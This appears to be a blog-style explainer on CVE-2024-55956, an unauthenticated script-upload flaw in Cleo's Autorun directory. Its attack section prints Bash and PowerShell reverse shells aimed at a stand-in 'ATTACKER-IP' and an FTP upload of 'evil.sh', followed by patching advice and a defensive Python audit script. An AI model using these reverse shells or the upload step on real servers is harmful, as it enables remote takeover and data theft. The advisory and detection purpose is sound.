In mid-2024, security researchers uncovered a critical vulnerability, CVE-2024-55956, affecting popular Cleo integration products: Harmony, VLTrader, and LexiCom (all versions before 5.8.0.24). The flaw allows anyone, without logging in, to run arbitrary Bash or PowerShell commands on the host server simply by uploading malicious scripts to the application's "Autorun" directory.
This post explains, step by step, what this vulnerability is, why it's dangerous, and how an attacker could use it. You'll also find code snippets and references for deeper reading.
What is the Autorun Directory?
Cleo's products make business data transfers easy and secure, automating many tasks after files arrive. One feature is the "Autorun" directory: a special folder where you can drop scripts that the server will automatically run after certain file events.
Normally, this is meant for trusted scripts and users. But due to how the default settings work, anybody can slip in their own script—even attackers!
Problem
- Since these Cleo products accept files into the Autorun directory unauthenticated (without verifying who's sending them), anyone can upload a file there.
- The server will then execute the uploaded script—whether it's Bash (.sh) on Linux/Unix or PowerShell (.ps1) on Windows.
Real-World Attack Example
Let's see how an attacker could exploit this on a vulnerable system.
On Linux/Unix (Bash)
```bash
#!/bin/bash
# reverse shell to attacker-controlled system
# (the original one-liner redirects stdin, stdout and stderr over /dev/tcp)
bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1
```
On Windows (PowerShell)
```powershell
# reverse shell in PowerShell
$client = New-Object System.Net.Sockets.TCPClient("ATTACKER-IP",4444);
$stream = $client.GetStream();
# 64 KiB receive buffer
[byte[]]$bytes = 0..65535|%{0};
# read commands from the socket until the remote side closes it
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    # run the received text and capture its output, including errors
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
}
$client.Close()
```
If the server allows uploads by default (e.g., via FTP/SFTP/MFT), you'd do the following:
On Linux:
```
ftp> put evil.sh /path/to/Autorun/evil.sh
```
On Windows:
```
# Use WinSCP, PSFTP, or any FTP client to upload evil.ps1 into the Autorun folder
```
Step 3: Wait for Execution
As soon as the Cleo service scans or processes the directory, it finds your script, and runs it automatically—which opens a reverse shell back to the attacker.
- No authentication required
- Any command can be run, including creating more user accounts, installing ransomware, or exfiltrating company data
References
- CVE-2024-55956 - NVD Details
- Cleo Harmony Release Notes
- Rapid7 Advisory
Conclusion
CVE-2024-55956 is a critical flaw: with little or no effort, an attacker could completely compromise your Cleo-managed file transfer server. If your organization uses any of these Cleo products, check your versions and update. Review who can upload or drop files, especially into Autorun directories.
Keep your software patched. Monitor high-risk folders, especially those with "automagic" behaviors like Autorun.
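Two of the checks recommended above (confirm the installed version is at or past the fixed release, and keep an eye on what actually lands in the Autorun directory) can be scripted. The following is an added, defender-side example written for this post; it is not Cleo's own code and does not use any Cleo API. It assumes a plain directory of scripts, an allow-list of SHA-256 hashes for the scripts you have approved, and a version string in dotted form; the sample files it creates are constructed for the demonstration.

```python
"""Audit an Autorun-style directory against an allow-list and check a version
string against the first fixed release named in the post (5.8.0.24).

Added example: the directory layout, allow-list format and sample files are
assumptions for illustration, not Cleo's real configuration.
"""
import hashlib
import tempfile
from pathlib import Path

# First release that closes CVE-2024-55956, per the post.
FIXED_VERSION = (5, 8, 0, 24)

# Assumption: extensions the server would treat as executable scripts.
SCRIPT_SUFFIXES = {".sh", ".ps1", ".bat", ".cmd"}


def parse_version(text):
    """Turn '5.8.0.21' into (5, 8, 0, 21) so tuples compare numerically."""
    return tuple(int(part) for part in text.strip().split("."))


def is_vulnerable_version(text):
    """True when the installed version is older than the fixed release."""
    return parse_version(text) < FIXED_VERSION


def sha256_file(path):
    """Hash a file in chunks so large drops do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_autorun(autorun_dir, approved_hashes):
    """Return findings for every file in autorun_dir not on the allow-list.

    Each finding records the file name, its hash and why it was flagged:
    an unapproved script (would execute) or an unexpected non-script file
    (someone could still write there, which is the real problem).
    """
    findings = []
    for entry in sorted(Path(autorun_dir).iterdir()):
        if not entry.is_file():
            continue
        digest = sha256_file(entry)
        if digest in approved_hashes:
            continue
        if entry.suffix.lower() in SCRIPT_SUFFIXES:
            reason = "unapproved script"
        else:
            reason = "unexpected file"
        findings.append({"file": entry.name, "sha256": digest, "reason": reason})
    return findings


def build_demo_dir():
    """Construct a throwaway directory: one approved script, one rogue script,
    one stray text file. Returns the directory and the allow-list for it."""
    demo = Path(tempfile.mkdtemp(prefix="autorun_demo_"))
    (demo / "archive.sh").write_text('#!/bin/bash\nmv "$1" /srv/archive/\n')
    (demo / "evil.sh").write_text("#!/bin/bash\necho rogue\n")
    (demo / "readme.txt").write_text("constructed sample, not a script\n")
    approved = {sha256_file(demo / "archive.sh")}
    return demo, approved


if __name__ == "__main__":
    for version in ("5.8.0.21", "5.8.0.24"):
        state = "VULNERABLE" if is_vulnerable_version(version) else "fixed"
        print(f"version {version}: {state}")
    demo_dir, allow_list = build_demo_dir()
    for finding in audit_autorun(demo_dir, allow_list):
        print(f"{finding['reason']}: {finding['file']} ({finding['sha256'][:12]}...)")
```

Run it on a schedule (or from a file-system watcher) against the real Autorun path with a hash list generated from your approved scripts; any finding is worth an alert, because on an unpatched host an unapproved script in that folder is not just suspicious, it will run.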
If you found this guide useful, consider sharing it with your IT/security team. Don’t be the next headline!
Timeline
Published on: 12/13/2024 21:15:13 UTC
Last modified on: 12/16/2024 18:15:12 UTC